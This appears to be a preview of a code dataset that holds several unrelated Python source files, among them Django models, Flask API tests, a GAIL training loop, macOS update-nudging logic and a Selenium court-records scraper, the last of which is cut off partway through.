content
stringlengths 5
1.05M
|
|---|
import datetime
from weunion.models import User, Town
from news.models import News
from petitions.models import Petitions
from defects.models import Issues
from polls.models import Poll
def city_stats():
users = []
for town in Town.objects.all():
count = User.objects.filter(towns=town).count()
defects = Issues.objects.filter(town_ref=town, parent_task_ref=None).count()
petitions = Petitions.objects.filter(town=town).count()
news = News.objects.filter(town=town).count()
polls = Poll.objects.filter(town=town).count()
if count > 4 or defects > 0 or petitions > 0 or news > 0 or polls > 0:
users.append((town.name, count, petitions, defects, news, polls))
return users
# Нижче даний модуль містить функції які використовуються для генерації статистики
# Кожна функція має однаковий набір параметрів date_from - date_to, розміщених для зручності використання у зворотному
# порядку
def users_registered(date_to=datetime.datetime.now(), date_from=datetime.datetime.min):
return User.objects.filter(date_joined__gte=date_from, date_joined__lte=date_to).count()
def news_published(date_to=datetime.datetime.now(), date_from=datetime.datetime.min):
return News.objects.filter(datetime_publish__gte=date_from, datetime_publish__lte=date_to).count()
def petitions_created(date_to=datetime.datetime.now(), date_from=datetime.datetime.min):
return Petitions.objects.filter(create_date__gte=date_from, create_date__lte=date_to).count()
def defects_created(date_to=datetime.datetime.now(), date_from=datetime.datetime.min):
return Issues.objects.filter(created__gte=date_from, created__lte=date_to, parent_task_ref=None).count()
def polls_created(date_to=datetime.datetime.now(), date_from=datetime.datetime.min):
return Poll.objects.filter(date_start__gte=date_from, date_start__lte=date_to).count()
|
# -*- coding: utf-8 -*-
"""
tests.test_api
~~~~~~~~~~~~~~
Test API
:author: Dave Caraway
:copyright: © 2014-2015, Fog Mine, LLC
templated from https://github.com/ryanolson/cookiecutter-webapp
"""
import pytest
from flask import url_for
from flask_jwt import generate_token
from tests.factories import UserFactory, RoleFactory, InviteFactory
from app.models.users import User
from bs4 import BeautifulSoup
import re
import sure
class TestRegistration:
"""Test user registration via the API"""
def test_register_data_invalid_email_generates_400(self, testapi, role, invite):
data = {"firstName":"myFirstName", "lastName":"myLastName", "email":"notareal email address", "password":"supersecret", "token":invite.token}
resp = testapi.post_json(url_for('v1.AuthView:register_user'), data, expect_errors=True)
resp.status_code.should.equal(400)
resp.json['status'].should.equal(400)
resp.json['message'].should.contain("is not a 'email'")
def test_syntactically_valid_invite_is_required_to_register(self, testapi, role, invite):
data = {"firstName":"myFirstName", "lastName":"myLastName", "email":"someone@somewhere.com", "password":"supersecret", "token":"badto"}
resp = testapi.post_json(url_for('v1.AuthView:register_user'), data, expect_errors=True)
resp.status_code.should.equal(400)
resp.json['status'].should.equal(400)
resp.json['message'].should.contain("too short")
def test_invite_is_not_required_to_register(self, testapi, role):
"""
SEE #93725066 User was unable to register after we removed the invite-only status
:return:
"""
data = {"firstName":"myFirstName", "lastName":"myLastName", "email":"someone@somewhere.com", "password":"supersecret"}
resp = testapi.post_json(url_for('v1.AuthView:register_user'), data)
resp.status_code.should.equal(201)
def test_valid_invite_is_required_to_register(self, testapi, role, invite):
data = {"firstName":"myFirstName", "lastName":"myLastName", "email":"someone@somewhere.com", "password":"supersecret", "token":"abadtokenhere"}
resp = testapi.post_json(url_for('v1.AuthView:register_user'), data, expect_errors=True)
resp.status_code.should.equal(409)
resp.json['status'].should.equal(409)
resp.json['message'].should.contain("Invite is invalid")
def test_register_user(self, apidb, testapi, role, invite):
data = {"firstName":"myFirstName", "lastName":"myLastName", "email":"agent@secret.com", "password":"supersecret", "token":invite.token}
resp = testapi.post_json(url_for('v1.AuthView:register_user'), data)
#test register user creates user but confirmed_at is not set
u = User.query.filter_by(email=data['email']).first()
from flask_security.utils import verify_and_update_password
verify_and_update_password(user=u, password='supersecret').should_not.be.none
u.confirmed_at.should.be.none
return resp
def test_register_user_assigns_user_role(self, apidb, testapi, role, invite):
resp = self.test_register_user(apidb, testapi, role, invite=invite)
resp.json['user']['roles'].should.have.length_of(1)
u = User.first(email='agent@secret.com')
u.roles.should.have.length_of(1)
u.roles.should.contain(role)
def test_register_user_returns_201(self, apidb, testapi, role, invite):
resp = self.test_register_user(apidb, testapi, role, invite=invite)
resp.status_code.should.equal(201)
resp.json['status'].should.equal(201)
resp.json['message'].should.contain("A confirmation email has been sent to agent@secret.com")
resp.json['user'].should_not.be.none
resp.json['user']['token'].should_not.be.none
def test_register_user_sends_confirmation_email(self, apidb, testapi, mail, role, invite):
with mail.record_messages() as outbox:
self.test_register_user(apidb, testapi, role, invite)
outbox.should.have.length_of(1)
m = outbox[0]
return m
def test_register_user_records_login(self, apidb, testapi, role, invite):
#SEE issue 90454516
self.test_register_user(apidb, testapi, role, invite)
#test register user creates user but confirmed_at is not set
u = User.query.filter_by(email='agent@secret.com').first()
u.current_login_at.should_not.be.none
u.current_login_ip.should_not.be.none
u.last_login_at.should_not.be.none
u.last_login_ip.should_not.be.none
def test_registered_but_unconfirmed_user_may_login(self, apidb, testapi, role, invite):
self.test_register_user(apidb, testapi, role, invite)
u = User.query.filter_by(email='agent@secret.com').first()
resp = testapi.post_json(url_for('jwt'), dict(username=u.email, password='supersecret'))
resp.status_code.should.equal(200)
def test_user_may_not_register_twice(self, apidb, testapi, user, invite):
data = {'email': user.email, 'password':'doesnt_matter', 'firstName':'joe', 'lastName':'bob', "token":invite.token}
resp = testapi.post_json(url_for('v1.AuthView:register_user'), data, expect_errors=True)
resp.status_code.should.equal(409)
resp.json['status'].should.equal(409)
resp.json['message'].should.contain('email already exists')
def test_invite_may_be_used_only_once(self, apidb, testapi, role, invite):
self.test_register_user(apidb=apidb, testapi=testapi, role=role, invite=invite)
# This second registration attempt will try to use the same token. It should NOT be able to succeed.
userData2 = {'email': "user2@me.com", 'password':'doesnt_matter', 'firstName':'jimminey', 'lastName':'jimminy', "token":invite.token}
resp = testapi.post_json(url_for('v1.AuthView:register_user'), userData2, expect_errors=True)
resp.status_code.should.equal(409)
resp.json['status'].should.equal(409)
resp.json['message'].should.contain('Invite already used')
def test_confirm_user(self, apidb, testapi, mail, role, invite):
m = self.test_register_user_sends_confirmation_email(apidb, testapi, mail, role, invite=invite)
u = User.find(email='agent@secret.com').first()
u.confirmed_at.should.be.none
token = self.get_confirmation_token_from_email(m)
href = url_for('v1.AuthView:confirm_email')
resp = testapi.post_json(href, dict(token=token))
# confirmed status should be set
u.confirmed_at.should_not.be.none
# confirmed user should receive a login credential set
resp.status_code.should.equal(200)
resp.json.get('user').should_not.be.none
def test_confirm_user_with_bad_token_409(self, apidb, testapi, mail, role, invite):
m = self.test_register_user_sends_confirmation_email(apidb, testapi, mail, role, invite=invite)
href = url_for('v1.AuthView:confirm_email')
resp = testapi.post_json(href, dict(token='notarealtoken'), expect_errors=True)
resp.status_code.should.equal(409)
resp.json['status'].should.equal(409)
resp.json['message'].should.contain('Invalid')
def test_user_may_not_confirm_twice(self, apidb, testapi, mail, role, invite):
m = self.test_register_user_sends_confirmation_email(apidb, testapi, mail, role, invite=invite)
token = self.get_confirmation_token_from_email(m)
href = url_for('v1.AuthView:confirm_email')
testapi.post_json(href, dict(token=token))
resp2 = testapi.post_json(href, dict(token=token), expect_errors=True)
resp2.status_code.should.equal(409)
def test_user_may_not_use_expired_token(self, apidb, testapi, mail):
#Token used via itsdangerous.URLSafeTimedSerializer
old_token = {'secret':'super secret', 'salt':'salty', 'token':'ImZvbyI.B4ovjQ.UAh0LfwlwReM9_FTughkAHpvxkQ'}
resp = testapi.post_json(url_for('v1.AuthView:confirm_email'), dict(token='notarealtoken'), expect_errors=True)
def get_confirmation_token_from_email(self, message):
"""Retrieves the confirmation link from the message"""
soup = BeautifulSoup(message.html)
return re.search('token=(.*)', soup.a['href']).group(1)
|
#coding:utf-8
#
# id: bugs.core_0198
# title: wrong order by in table join storedproc
# decription:
# tracker_id: CORE-0198
# min_versions: ['2.5.0']
# versions: 2.5
# qmid: None
import pytest
from firebird.qa import db_factory, isql_act, Action
# version: 2.5
# resources: None
substitutions_1 = []
init_script_1 = """"""
db_1 = db_factory(sql_dialect=3, init=init_script_1)
test_script_1 = """
recreate table my_table
(
k varchar(10) not null,
d1 integer,
d2 integer,
v1 varchar(10),
primary key (k)
);
set term ^;
create or alter procedure select_me returns(
data varchar(10)
) as
begin
data = 'one';
suspend;
data = 'two';
suspend;
data = 'three';
suspend;
end
^
set term ;^
commit;
insert into my_table values ('one', 1, 99, 'zz');
insert into my_table values ('two', 2, 98, 'yy');
insert into my_table values ('three', 3, 97, 'xx');
commit;
set list on;
select *
from my_table t join select_me p on (t.k = p.data)
order by t.d1
;
commit;
create index i1 on my_table(d1);
commit;
select *
from my_table t join select_me p on (t.k = p.data)
order by t.d1
;
commit;
"""
act_1 = isql_act('db_1', test_script_1, substitutions=substitutions_1)
expected_stdout_1 = """
K one
D1 1
D2 99
V1 zz
DATA one
K two
D1 2
D2 98
V1 yy
DATA two
K three
D1 3
D2 97
V1 xx
DATA three
K one
D1 1
D2 99
V1 zz
DATA one
K two
D1 2
D2 98
V1 yy
DATA two
K three
D1 3
D2 97
V1 xx
DATA three
"""
@pytest.mark.version('>=2.5')
def test_1(act_1: Action):
act_1.expected_stdout = expected_stdout_1
act_1.execute()
assert act_1.clean_stdout == act_1.clean_expected_stdout
|
#print the following lines
print "Mary had a little lamb."
print "Its fleece was white as %s." % 'snow'
print "And Everywhere that Mary went."
#print 10 times the '.' character
print "." * 10 #What'd that do?
#Variable assignment to each letter of the word Cheeseburger
end1 = "C"
end2 = "h"
end3 = "e"
end4 = "e"
end5 = "s"
end6 = "e"
end7 = "B"
end8 = "u"
end9 = "r"
end10 = "g"
end11 = "e"
end12 = "r"
# watch that comma at the end. Try removing it and see what happens
#Print the variables of end<x> either in the same line or two seperate lines depending on ','
print end1 + end2 + end3 + end4 + end5 + end6
print end7 + end8 + end9 + end10 + end11 + end12
|
from ...models.user import User
from ...models.role import Role
from werkzeug.security import generate_password_hash
import random
import string
import smtplib
from email.message import EmailMessage
from os import getenv
def user_found(email: str = None, password: str = None) -> bool:
user_exist = User().check_credentials(email, password)
if user_exist == True:
return True
def hash_password(password: str = None) -> str:
hashed_password = generate_password_hash(password, 'sha256')
return hashed_password
def get_role_id(role: str = None) -> int:
role_id = Role.get_id(role)
return role_id
def random_characters():
char_count = 10
random_char = ''.join(random.choices(string.ascii_uppercase + string.digits, k = char_count))
return random_char
def gmail_code(code: str = None, reciever: str = None) -> None:
msg = EmailMessage()
msg['Subject'] = 'FODO Reset Code'
msg['From'] = 'Food Donation'
msg['To'] = reciever
content = f'Your reset code: {code}'
msg.set_content(content)
# Establish connection
server = smtplib.SMTP_SSL('smtp.gmail.com', 465)
server.login(getenv('FODO_GMAIL_ADDRESS'), getenv('FODO_GMAIL_PASSWORD'))
# Send mail
server.send_message(msg)
return None
def check_email_registration(email):
email_exist = User().check_email_existence(email)
if email_exist:
return True
return False
def check_org_registration(org_name):
org_exist = User().check_org_existence(org_name)
if org_name == '':
return False
elif org_exist:
return True
else:
return False
def check_contact_registration(number):
contact_exist = User().check_contact_existence(number)
if contact_exist:
return True
return False
def save_new_password(email, password):
hashed_password = hash_password(password)
User().save_new_password(email,hashed_password)
return
def get_role(email: str) -> str:
role = User().get_role(email)
return role
|
#! python3
import re
from math import sqrt
from typing import Union, Optional
import language_check
import constants
lt: language_check.LanguageTool = language_check.LanguageTool('en-US')
def grammar_check(text: str) -> Union[str, bool]:
text = language_check.correct(text, lt.check(text))
if len(lt.check(text)) > 0:
return False
return text
def get_weight(tweet) -> int:
precise_weight = int((tweet.retweet_count*5 + tweet.favorite_count)/sqrt(tweet.author.followers_count))
limited_weight = min(precise_weight, 20)
# limit the weight of a single tweet to 20 \
# to avoid being 'overrun' by one viral tweet
return limited_weight
def get_viable_text(tweet) -> Optional[str]:
string = get_plain_text(tweet.text)
if (not string) or (re.search('[a-zA-Z]', string) is None) or (tweet.author in constants.IGNORED_USERS):
return None
return string
def get_plain_text(raw_tweet_text: str) -> str:
raw_tweet_text = re.sub(r'https?://t.co/\S+', '', raw_tweet_text)
raw_tweet_text = re.sub(r'http://t.co/\S+', '', raw_tweet_text)
# remove URLs. Since twitter uses an URL shortener, all URLs look like: "https://t.co/Amn4oTgxkD"
# except URLs from tweets longer ago, these might still look like "http://t.co/Amn4oTgxkD"
raw_tweet_text = re.sub(r'.?@\w+[: ]', '', raw_tweet_text)
# remove mentions. Mentions look like "@_jfde" or "@_jfde:"
raw_tweet_text = re.sub(r'^RT', '', raw_tweet_text)
# remove retweet identifiers. Retweets in plain text look like: "RT @_jfde: Original tweet text"
raw_tweet_text = re.sub(r'#\w+', '', raw_tweet_text)
# remove hashtags. Example: "I really like #python!" where "#python" is changed to "python"
raw_tweet_text = re.sub(r'[\n ]+', ' ', raw_tweet_text)
# remove newlines and multiple whitespaces
raw_tweet_text = raw_tweet_text.strip() # remove whitespaces at the beginning or end of a tweet
return grammar_check(raw_tweet_text) # improve the grammar of these lazy twitter users
def make_tweet_text(raw_tweet_text: str) -> Union[str, bool]:
tweet = get_plain_text(raw_tweet_text)
if not tweet:
return False
if not tweet[-1] in {'.', '!', '?', ','}:
tweet += '.'
if 0 < len(tweet) <= 140:
return tweet
else:
return False
if __name__ == '__main__':
# run tests
print(get_plain_text(r"@123 https://t.co/f3g Definitely important infomration! @_12jfde \n "))
|
import numpy as np
import math
import torch
import torch.nn as nn
import torch.optim as optim
import torch.autograd as autograd
import torch.nn.functional as F
import pickle
from lib.model import *
from lib.zfilter import ZFilter
from lib.util import *
from lib.ppo import ppo_step
from lib.data import *
def gail_learn(args):
'''env params'''
env_name, batch_size, vv, mm, als, ex_path, fig_path = args.env_id, args.batch_size, args.vv,args.mm, args.als, args.ex_path, args.fig_path
'''ppo params'''
ppo_eps, ppo_epoches = args.ppo_eps, args.ppo_epoches
'''data '''
data_n_steps, max_genert_num, gamma, lambd = args.data_n_steps, args.max_genert_num, args.gamma, args.lambd
'''set up '''
env = gym.make(env_name)
env.seed(args.seed)
np.random.seed(args.seed)
torch.manual_seed(args.seed)
device = torch.device("cuda" if args.use_cuda and torch.cuda.is_available() else "cpu")
#zflt = ZFilter((env.observation_space.shape[0],), clip=5)
dtype = torch.float64
torch.set_default_dtype(dtype)
'''model and optim'''
policy_model =ModelActor(env.observation_space.shape[0],env.action_space.shape[0]).to(device)
print(env.observation_space.shape[0])
if args.action == '3':
critic_model =ModelCritic(env.observation_space.shape[0]).to(device)
else:
critic_model =ModelCritic(env.observation_space.shape[0]).to(device)
#critic_model =ModelCritic(env.observation_space.shape[0]).to(device)
opt_policy = optim.Adam(policy_model.parameters(), lr = args.lr_policy)
opt_critic = optim.Adam(critic_model.parameters(), lr = args.lr_critic)
'''
args.action == '0' : standard GAIL
args.action == '1' : GAIL without expert action
args.action == '2' : GAIL without expert action, but input agent action
'''
if args.action == '1':
D = ModelDCritic(env.observation_space.shape[0], 0).to(device)
elif args.action == '3':
t = env.observation_space.shape[0]
D = ModelDCritic(t, t).to(device)
else:
D = ModelDCritic(env.observation_space.shape[0], env.action_space.shape[0]).to(device)
opt_D = optim.Adam(D.parameters(), lr = args.lr_critic)
if args.action == '2':
pass
zflt = pickle.load(open(ex_path+env_name+'_expert'+vv+'.p', 'rb'))
gene = generate2(policy_model, env, env_name, als, device, data_n_steps, ex_path, fig_path, vv, max_genert_num, zflt, critic_model, args.action, args.seed, expert_reward, D, mm)
d_criterion = nn.BCELoss()
experts = np.load(ex_path+env_name+'_ppo'+vv+'_state_action.npy')
if args.action == '3':
experts = np.hstack((experts[:-1, :t], experts[1:, :t]))
print(experts.shape)
ex_states_actions_ = experts#[np.random.randint(0,experts.shape[0], ),:]
E_loss, G_loss, V_loss, P_loss = [], [], [], []
L_idx = 0
for trj in gene:
_logstd = policy_model.logstd.data.cpu().numpy()
print('policy model sigma:' )
print(_logstd)
L_idx += 1
states, actions, rewards, dones, values = trj['states'], trj['actions'], trj['rewards'], trj['dones'], trj['values']
print(actions[-1])
print(trj['mean'])
print(trj['std'])
#if args.action == '3':
# states = np.stack((states[:-1], states[1:]), axis=1)
states = torch.from_numpy(np.stack(states)).to(dtype).to(device)
actions = torch.from_numpy(np.stack(actions)).to(dtype).to(device)
rewards = torch.from_numpy(np.stack(rewards)).to(dtype).to(device)
dones = torch.from_numpy(np.stack(dones)).to(dtype).to(device)
values = torch.from_numpy(np.stack(values)).to(dtype).to(device).unsqueeze(-1)
with torch.no_grad():
#values = critic_model(states)
#values = expert_reward(D, states, actions)
old_logprob = policy_model.get_log_prob(states, actions)
adv, ref = cal_adv_ref(rewards, dones, values, gamma, lambd, device)
''' discrim optimization '''
for _ in (range(1)):
if args.action == '1' :
t = env.observation_space.shape[0]
ex_states_actions_ = experts[np.random.randint(0,experts.shape[0], 2000), :t]
ge_q_value = D(states)
elif args.action == '0':
ex_states_actions_ = experts[np.random.randint(0,experts.shape[0], 2000),:]
ge_q_value = D(torch.cat([states, actions], 1))
elif args.action == '2':
t = env.observation_space.shape[0]
rd = np.random.randint(0,experts.shape[0], 2000)
ex_states_actions_ = experts[rd, :t]
ex_states = torch.tensor(experts[rd,:t]).unsqueeze(0).to(device)
with torch.no_grad():
#ex_actions = policy_model.select_action(ex_states)[0].cpu().numpy()
ex_actions, mean_, std_ = policy_model.select_action(ex_states)
ex_actions = ex_actions[0].cpu().numpy()
ge_q_value = D(torch.cat([states, actions], 1))
ex_states_actions_ = np.hstack([ex_states_actions_, ex_actions])
elif args.action == '3':
t = env.observation_space.shape[0]
ex_states_actions_ = experts[np.random.randint(0,experts.shape[0], 2000), :]
states_ = torch.cat((states[:-1], states[1:]), 1)
ge_q_value = D(states_)
ex_states_actions = torch.from_numpy(ex_states_actions_).to(device)
## 1A train on real/expert
ex_q_value = D(ex_states_actions)
opt_D.zero_grad()
loss_ex = d_criterion(ex_q_value,torch.zeros((ex_q_value.shape[0],1), device=device))
E_loss.append(loss_ex.data.cpu().numpy())
#print(loss_ex.data.cpu().numpy())
## 1B train on fake/generate
loss_ge = d_criterion(ge_q_value, torch.ones((ge_q_value.shape[0],1), device=device))
G_loss.append(loss_ge.data.cpu().numpy())
loss_d = loss_ex + loss_ge
loss_d.backward()
opt_D.step()
opt_iter = int(math.ceil(states.shape[0]/batch_size))
P_loss_ = []
V_loss_ = []
for epoch in range(args.ppo_epoches):
perm = np.arange(states.shape[0])
#np.random.shuffle(perm)
perm = torch.LongTensor(perm).to(device)
states, actions, ref = states[perm].clone(), actions[perm].clone(), ref[perm].clone()
adv, old_logprob = adv[perm].clone(), old_logprob[perm].clone()
for i in range(opt_iter):
ind = slice(i * batch_size, min((i + 1) * batch_size, states.shape[0]))
b_states = states[ind]
b_actions = actions[ind]
b_adv = adv[ind]
b_ref = ref[ind]
b_old_logprob = old_logprob[ind]
#print(b_states.size())
#print(b_actions.size())
#print(b_ref.size())
#print(ref.size())
#qnew = expert_reward(D, b_states, b_actions, args.action)
#b_ref = qnew
v_loss, p_loss = ppo_step(policy_model, critic_model, opt_critic, opt_policy, b_states, b_actions, b_ref, b_adv, b_old_logprob)
P_loss_.append(p_loss)
V_loss_.append(v_loss)
P_loss.append(np.mean(P_loss_))
V_loss.append(np.mean(V_loss_))
signs = ''
if args.action == '1':
signs = '_no_action'
pp = fig_path+'loss_ac1/'
elif args.action == '2':
signs = '_ag_action'
pp = fig_path+'loss_ac2/'
else:
signs = ''
pp = fig_path+'loss/'
signs += '_seed'+str(args.seed)
#plot(0, E_loss, pp, env_name+als+'vv'+vv+'mm'+mm+'E_loss'+signs)
#plot(1, G_loss, pp, env_name+als+'vv'+vv+'mm'+mm+'G_loss'+signs)
#plot(2, V_loss, pp, env_name+als+'vv'+vv+'mm'+mm+'V_loss'+signs)
#plot(3, P_loss, pp, env_name+als+'vv'+vv+'mm'+mm+'P_loss'+signs)
torch.save(D.state_dict(), ex_path+env_name+'_DModel_vv'+vv+'mm'+mm+'ac'+args.action)
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10.8 on 2019-02-25 16:27
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('tests', '0003_IBAN'),
]
operations = [
migrations.RemoveField(
model_name='customer',
name='fb_id',
),
migrations.AddField(
model_name='customer',
name='facebook_id',
field=models.CharField(blank=True, help_text='Facebook ID used for login via Facebook.', max_length=256,
null=True, verbose_name='Facebook ID'),
),
]
|
# BSD 3-Clause License
#
# Copyright (c) 2021., Redis Labs Modules
# All rights reserved.
#
import argparse
import os
from redis_benchmarks_specification.__cli__.args import spec_cli_args
from redis_benchmarks_specification.__cli__.cli import cli_command_logic
def test_run_local_command_logic_oss_cluster():
# should error due to missing --use-tags or --use-branch
parser = argparse.ArgumentParser(
description="test",
formatter_class=argparse.ArgumentDefaultsHelpFormatter,
)
parser = spec_cli_args(parser)
args = parser.parse_args(args=[])
try:
cli_command_logic(args, "tool", "v0")
except SystemExit as e:
assert e.code == 1
# should error due to missing --use-tags or --use-branch
parser = argparse.ArgumentParser(
description="test",
formatter_class=argparse.ArgumentDefaultsHelpFormatter,
)
parser = spec_cli_args(parser)
TST_REDIS_DIR = os.getenv("TST_REDIS_DIR", None)
run_args = ["--use-tags"]
if TST_REDIS_DIR is not None:
run_args.extend(["--redis_repo", TST_REDIS_DIR])
args = parser.parse_args(
args=run_args,
)
try:
cli_command_logic(args, "tool", "v0")
except SystemExit as e:
assert e.code == 0
|
import sys
from distutils.version import LooseVersion
from os.path import exists
from datetime import datetime
# pylint: disable=no-name-in-module
from Foundation import NSDate
# pylint: enable=no-name-in-module
from .helpers import (nudgelog,
download_apple_updates,
pending_apple_updates,
update_need_restart,
update_app_path,
get_os_version_major)
from .prefs import set_app_pref, app_pref, pref
from .constants import APPLE_SUS_PREFS_PATH, APPLE_SUS_PREFS
class NudgeLogic():
'''Class that define the logic for nudge'''
def __init__(self, nudge_prefs):
self.nudge_prefs = nudge_prefs
self.min_major = nudge_prefs['minimum_os_version_major']
self.local_url = nudge_prefs['local_url_for_upgrade']
self.path_to_app = nudge_prefs['path_to_app']
self.update_minor = nudge_prefs['update_minor']
self.time_between_notif = nudge_prefs['time_between_notifications']
self.major_version = get_os_version_major()
self.minor_updates_required = False
self.first_seen = False
self.last_seen = False
def start(self):
'''Function that will start the nudge logic'''
if LooseVersion(self.min_major) > self.major_version:
self._check_local_url()
else:
self._check_updates_availability()
_only_background_updates(self._minor_updates_required())
self._no_nudge_all_time()
return self._update_nudgeprefs()
def _check_local_url(self):
self.first_seen = app_pref('first_seen')
self.last_seen = app_pref('last_seen')
if self.local_url:
self.path_to_app = self.local_url
else:
if not exists(self.path_to_app):
nudgelog('Update application not found! Exiting...')
sys.exit(1)
def _check_updates_availability(self):
if self.update_minor:
_download_updates()
def _minor_updates_required(self):
self.first_seen = app_pref('first_seen')
self.last_seen = app_pref('last_seen')
self.path_to_app = update_app_path()
if _all_apple_sus_prefs():
return update_need_restart()
return True
def _no_nudge_all_time(self):
if (self.time_between_notif > 0 and self.first_seen and self.last_seen):
difference = _last_seen_vs_now(self.last_seen)
if difference.seconds < self.time_between_notif:
info = 'Last seen date is within notification threshold'
nudgelog(f'{info}: {str(self.time_between_notif)} seconds')
sys.exit(0)
if not self.first_seen:
set_app_pref('first_seen', NSDate.new())
self.first_seen = app_pref('first_seen')
def _update_nudgeprefs(self):
self.nudge_prefs['minimum_os_version_major'] = self.min_major
self.nudge_prefs['local_url_for_upgrade'] = self.local_url
self.nudge_prefs['path_to_app'] = self.path_to_app
self.nudge_prefs['update_minor'] = self.update_minor
self.nudge_prefs['time_between_notifications'] = self.time_between_notif
return self.nudge_prefs
def _download_updates():
nudgelog('Checking for minor updates.')
swupd_output = download_apple_updates()
if not swupd_output:
nudgelog('Could not run softwareupdate')
# Exit 0 as we might be offline
# TODO: Check if we're offline to exit with the
# appropriate code
sys.exit(0)
if pending_apple_updates() == [] or pending_apple_updates() is None:
nudgelog('No Software updates to install')
set_app_pref('first_seen', None)
set_app_pref('last_seen', None)
sys.exit(0)
def _all_apple_sus_prefs():
sus_prefs = [pref(key, APPLE_SUS_PREFS_PATH) for key in APPLE_SUS_PREFS]
if False in sus_prefs:
return False
return True
def _only_background_updates(minor_updates_required):
if not minor_updates_required:
nudgelog('Only updates that can be installed in the background pending.')
set_app_pref('first_seen', None)
set_app_pref('last_seen', None)
sys.exit()
def _last_seen_vs_now(last_seen):
today = datetime.utcnow()
last_seen_strp = datetime.strptime(last_seen, '%Y-%m-%d %H:%M:%S +0000')
difference = today - last_seen_strp
return difference
if __name__ == '__main__':
print('This is a library of support tools for the Nudge Tool.')
|
import glob
import json
import logging
import os
import sys
import time
import urllib
import click
import coloredlogs
import pandas as pd
from requests.exceptions import RequestException
from selenium import webdriver
from selenium.common.exceptions import NoSuchElementException, TimeoutException
from selenium.webdriver.common.action_chains import ActionChains
from selenium.webdriver.common.by import By
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.support import expected_conditions as ec
from selenium.webdriver.support.ui import Select, WebDriverWait
from webdriver_manager.chrome import ChromeDriverManager
logger = logging.getLogger(__name__)
coloredlogs.install(
level=getattr(logging, os.getenv("logLevel", "info").upper()),
logger=logger,
fmt="[%(levelname)s] - %(asctime)s - %(processName)s|%(funcName)s(%(lineno)s): %(message)s",
)
logger.debug("Iniciando app")
# Constantes
ENTRY_ENDPOINT = (
r"https://procesos.ramajudicial.gov.co/consultaprocesos/ConsultaJusticias21.aspx"
)
def remove_temp_files():
files = glob.glob("*.csv")
for file in files:
try:
os.remove(file)
except Exception as e:
logger.error("No se ha podido eliminar el archivo temporal: " + file)
logger.exception(e)
def wait_for_by_name(driver, element_name, timeout=10):
"""Espera a que un elemento con el nombre = element_name
este presente, y lo devuelve.
:param driver: driver a usar
:type driver: webdriver.WebDriver
:param element_name: atributo html ´´name´´ del elemento a buscar
:type element_name: str
:return: elemento buscado
:rtype: webelement.WebElement
"""
wait = WebDriverWait(driver, timeout)
logger.debug("Esperando por: " + element_name)
element = wait.until(ec.visibility_of_element_located((By.NAME, element_name)))
logger.debug(element_name + ": OK")
return element
def wait_for_by_xpath(driver, element_xpath, timeout=10, wait_visibility=True):
"""Espera a que un elemento con la ruta = element_xpath
este presente, y lo devuelve.
:param driver: driver a usar
:type driver: webdriver.WebDriver
:param element_xpath: expresion xpath dentro del html del driver
:type element_xpath: str
:param timeout: tiempo maximo a esperear
:type timeout: float
:param wait_visibility: esperara a que este visible o invisible
:type wait_visibility: bool
:return: elemento buscado
:rtype: webelement.WebElement
"""
wait = WebDriverWait(driver, timeout)
logger.debug("Esperando por: " + element_xpath)
if wait_visibility:
check = ec.presence_of_element_located
else:
check = ec.invisibility_of_element_located
element = wait.until(check((By.XPATH, element_xpath)))
logger.debug(element_xpath + ": OK")
return element
def wait_for_all_by_name(driver, element_name, timeout=10):
"""Espera a que un elemento con el nombre = element_name
este presente, y lo devuelve.
:param driver: driver a usar
:type driver: webdriver.WebDriver
:param element_name: atributo html ´´name´´ del elemento a buscar
:type element_name: str
:return: elemento buscado
:rtype: webelement.WebElement
"""
wait = WebDriverWait(driver, timeout)
logger.debug("Esperando por: " + element_name)
element = wait.until(ec.visibility_of_all_elements_located((By.NAME, element_name)))
logger.debug(element_name + ": OK")
return element
def get_options(driver, element_name):
element = wait_for_by_name(driver, element_name)
select_element = Select(element)
elements = {
element.text: element.get_attribute("value")
for element in select_element.options[1:]
}
return elements
def handle_error(driver):
"""Busca el boton de ´´Cerrar´´ y lo presiona
:param driver: driver a usar
:type driver: webdriver.WebDriver
"""
logger.debug("Presionando boton cerrar")
xpath = "//div[@id='modalError']//*/td/input[@value='Cerrar' and @type='button']"
element_error_button = driver.find_element_by_xpath(xpath)
element_error_button.click()
logger.debug("Presionando boton cerrar: ok")
def test_error(driver):
"""Checkea si esta desplegada la ventana de error y lo maneja
:param driver: driver a usar
:type driver: webdriver.WebDriver
:return: True si hay error, y False en caso contrario
:rtype: bool
"""
try:
wait = WebDriverWait(driver, 3)
xpath = "//div[@id='modalError' and @style='display: block;']"
wait.until(ec.visibility_of_element_located((By.XPATH, xpath)))
handle_error(driver)
return True
except TimeoutException:
return False
def scrap_entity(driver, entity_name, entity_code, text2search):
logger.info("Obteniendo datos para: " + entity_name.strip())
df = pd.DataFrame()
# Se selecciona la entidad
ddlEntidadEspecialidad = wait_for_by_name(driver, "ddlEntidadEspecialidad")
select_entidad = Select(ddlEntidadEspecialidad)
select_entidad.select_by_value(entity_code)
if test_error(driver):
logger.debug(
"Se ha presentado una ventana "
"de error inexperada para la entidad: " + entity_name.strip()
)
return df
rblConsulta = wait_for_by_name(driver, "rblConsulta")
select_person = Select(rblConsulta)
select_person.select_by_index(1)
ddlTipoSujeto = wait_for_by_name(driver, "ddlTipoSujeto")
select_subject_type = Select(ddlTipoSujeto)
select_subject_type.select_by_index(2)
ddlTipoPersona = wait_for_by_name(driver, "ddlTipoPersona")
select_person_type = Select(ddlTipoPersona)
select_person_type.select_by_index(2)
txtNatural = wait_for_by_name(driver, "txtNatural")
txtNatural.clear()
txtNatural.send_keys(text2search)
# slider
sliderBehaviorConsultaNom_railElement = driver.find_element_by_id(
"sliderBehaviorConsultaNom_railElement"
)
move = ActionChains(driver)
move.click_and_hold(sliderBehaviorConsultaNom_railElement).move_by_offset(
10, 0
).release().perform()
btnConsultaNom = wait_for_by_name(driver, "btnConsultaNom")
btnConsultaNom.click()
try:
time.sleep(1)
## esperar a que el boton de ´´Cargando´´ cambie su estilo a displat: none
xpath = "//div[@id='miVentana']"
wait_for_by_xpath(driver, xpath, timeout=30, wait_visibility=False)
except TimeoutException:
logger.info("No lo encuentro")
if test_error(driver):
logger.debug(
"Se ha presentado una ventana "
"de error inexperada para la entidad: " + entity_name.strip()
)
return df
# esperar resultados
btnGetCSV = wait_for_by_name(driver, "btnGetCSV")
btnGetCSV.click()
# los resultados son presentados para descargar mediante un link
# se obtiene el link y se descarga directamente.
